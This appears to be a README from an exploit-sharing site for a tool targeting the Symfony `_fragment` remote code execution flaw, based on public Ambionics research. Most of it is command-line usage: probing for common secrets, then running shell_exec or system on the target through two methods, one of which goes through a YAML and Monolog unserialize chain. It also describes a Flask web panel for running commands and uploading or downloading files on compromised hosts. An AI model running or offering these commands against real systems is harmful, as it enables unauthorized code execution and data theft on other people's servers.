## https://sploitus.com/exploit?id=CCC89B53-A1C3-5E64-A55F-CCF4ED4A9D31
# Symfony-RCE
Exploit for the Symfony `_fragment` Remote Code Execution (RCE) vulnerability.
Based on the PoC by [Ambionics (Lexfo)](https://github.com/ambionics/symfony-exploits) and the related research article: [Symfony Secret Fragment](https://www.ambionics.io/blog/symfony-secret-fragment).
## Files
- **`exploit.py`** โ CLI exploitation script (discovery + exploit). Adapted from the original PoC by cfreal @ Ambionics.
- **`web.py`** โ Interactive web interface (Flask) to run commands, download and upload files on the target.
- **`config.json.example`** โ Example configuration for the web interface.
## Usage
### CLI (`exploit.py`)
```bash
# Discovery โ try common secrets
python3 exploit.py https://target.com/_fragment
# With a known secret
python3 exploit.py https://target.com/_fragment --secret 'CustomKey123!'
# Exploit โ method 1 (direct function call)
python3 exploit.py https://target.com/_fragment \
--secret 'CustomKey123!' \
--internal-url http://target.internal.com/_fragment \
--method 1 \
--function shell_exec \
--parameters cmd:'id'
# Exploit โ method 2 (YAML + unserialize via Monolog)
python3 exploit.py https://target.com/_fragment \
--secret 'CustomKey123!' \
--internal-url http://target.internal.com/_fragment \
--method 2 \
--function system \
--parameters 'id'
```
### Web interface (`web.py`)
```bash
cp config.json.example config.json
# Edit config.json with your target parameters
python3 web.py --port 5000
```
Then open `http://127.0.0.1:5000` in a browser.
## Dependencies
```bash
pip install requests flask
```